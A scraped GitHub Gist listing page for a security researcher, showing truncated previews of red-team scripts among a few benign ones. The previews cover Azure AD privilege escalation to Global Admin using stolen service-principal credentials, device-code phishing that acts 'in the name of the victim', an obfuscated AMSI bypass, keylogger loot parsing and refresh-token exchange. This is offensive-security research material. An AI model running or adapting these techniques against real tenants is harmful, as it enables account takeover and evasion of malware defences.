m8r1us
m8r1us
/ set-proxy-for-whole-machine.cmd
Created
January 17, 2020 15:09
— forked from hallzy/set-proxy-for-whole-machine.cmd
Please read the Notes at the top of each of the scripts before you run them. Set Windows IE proxy with a cmd file, or set Windows IE proxy globally by changing the "DefaultConnectionSettings" registry key as well as "ProxySettingsPerUser" and "Proxy" for GPO settings. PLEASE SAVE A COPY OF YOUR REGISTRY JUST IN CASE YOU NEED TO GO BACK!
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| :: NOTE: If you don't want to make proxy settings for the whole machine, | |
| :: find the line in this script that starts with "reg add" and change | |
| :: "HKLM" to "HKCU" so that it only affects the current user (or change it | |
| :: to reflect the specific hive that you want to change) | |
| :: Supported Characters in proxy server address (if you need more, consult | |
| :: an ascii table and make a new "if" statement for the character you need, | |
| :: but these should suffice): | |
| :: * - . / : ; = ? @ ~ < > | |
| :: All Numbers |
m8r1us
/ AttackPathDevOps-Sp-AppRole-GA
Created
June 6, 2022 17:54
AttackPathDevOps-Sp-AppRole-GA.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Author: Marius Elmiger (@m8r1us) | |
| # Description: Use extracted DevOps Credentials from a Service Principal to grant Global Admin rights by chaining AppRoleAssignment.ReadWrite.All with RoleManagement.ReadWrite.Directory | |
| # | |
| # The script includes code from from https://gist.github.com/andyrobbins/7e52f6fe255a2dcadb69745dc8640441#file-api-abuse-to-ga-ps1 (@_wald0) | |
| # 1 The Azure AD User I want to add to GA Role (objectid) | |
| $userToAddToGa = "3bffb11a-b991-4d1f-....." | |
| # 2 Extracted information from Azure DevOps | |
| $applicationId = "64396535663062302D666163392D....." |
m8r1us
/ AzureAD_DeviceCode_Flow.ps1
Created
December 28, 2022 17:45
Script to automate the Azure AD Device Code Flow
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Author: Marius Elmiger (@m8r1us) | |
| # Description: Script to automate the Azure AD Device Code Flow | |
| # Define an Azure AD Application from which you want to connect in the name of the victim to a resource | |
| # client_id = Microsoft Office App | |
| # resource = Microsoft Graph | |
| $body=@{ | |
| "client_id" = "d3590ed6-52b3-4102-aeff-aad2292ab01c" | |
| "resource" = "https://graph.microsoft.com" | |
| } |
m8r1us
/ gist:214c79ef755524e48545b274224f1a95
Created
May 8, 2023 17:03
Patches AMSI for both the PowerShell and CLR runtime (Slightly obfuscated)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $MethodDefinition = @" | |
| [DllImport(`"kernel32`", EntryPoint="GetProcAddress")] | |
| public static extern IntPtr GetProc(IntPtr hModule, string procName); | |
| [DllImport(`"kernel32`")] | |
| public static extern IntPtr GetModuleHandle(string lpModuleName); | |
| [DllImport(`"kernel32`",EntryPoint="VirtualProtect" )] | |
| public static extern bool Virtual(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); | |
| "@; |
m8r1us
/ keycroc_char_analysis.ps1
Last active
June 30, 2023 09:51
Simple KeyCroc croc_char.log analysis script
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Author: Marius Elmiger (@m8r1us) | |
| # Description: Simple KeyCroc croc_char.log analysis script | |
| # Croc_char.log location | |
| $file = "C:\tmp\croc_char.log" | |
| $content = Get-Content $file | |
| # Format Loot file with line breaks | |
| $modifiedText = $content -replace '(\[[^\]]+\])', "`n`$1`n" | |
| $modifiedText = $modifiedText -replace "`n{2,}", "`n" |
m8r1us
/ dependency_chain.json
Created
September 18, 2023 14:52
Dependency Chain -> https://arrows.app/
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "nodes": [ | |
| { | |
| "id": "n0", | |
| "position": { | |
| "x": 1239.9485302406829, | |
| "y": 11.014798303606455 | |
| }, | |
| "caption": "Domain Controller", | |
| "labels": [], |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html xmlns="http://www.w3.org/1999/xhtml"> | |
| <head> | |
| <title>File Uploader</title> | |
| <script> | |
| /*! | |
| * jQuery JavaScript Library v1.7.1 | |
| * http://jquery.com/ | |
| * | |
| * Copyright 2011, John Resig |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Define an Azure AD Application from which you want to connect in the name of the victim to a resource | |
| #client_id = Microsoft Office App | |
| #resource = Microsoft Graph | |
| $body=@{ | |
| "client_id" = "d3590ed6-52b3-4102-aeff-aad2292ab01c" | |
| "resource" = "https://graph.microsoft.com" | |
| } | |
| #Define an UserAgent that is widely used | |
| $UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| fetch('https://name.azurewebsites.net/api/HttpTrigger1', { | |
| method: 'POST', | |
| body: "<yourcontent>", | |
| headers: {'x-functions-key': 'key'} | |
| }); |
m8r1us
/ MSGraph-to-AzureManagementToken.ps1
Created
February 19, 2024 13:11
MSGRAPH to AzureManagementToken
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $TenantId = "" | |
| $authUrl = "https://login.microsoftonline.com/$($TenantId)" | |
| $body = @{ | |
| "scope" = "https://management.azure.com/.default offline_access openid" | |
| "client_id" = "d3590ed6-52b3-4102-aeff-aad2292ab01c" | |
| "grant_type" = "refresh_token" | |
| "refresh_token" = "" | |
| } |
OlderNewer